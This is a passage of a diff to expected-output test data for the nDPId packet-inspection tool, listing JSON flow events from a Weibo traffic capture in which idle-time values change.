{"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1463089073334,"flow_last_seen":1463089073893,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20023,"flow_avg_l4_payload_len":572,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1463089073424,"flow_last_seen":1463089073885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":398,"flow_tot_l4_payload_len":398,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35811,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071994,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"54.225.163.210","src_port":40440,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089069330,"flow_last_seen":1463089069374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089070086,"flow_last_seen":1463089070131,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.78","src_port":58481,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073537,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50831,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073488,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073478,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089072885,"flow_last_seen":1463089073423,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073424,"flow_last_seen":1463089073424,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":16804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072046,"flow_last_seen":1463089072070,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.65","src_port":34699,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48352,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 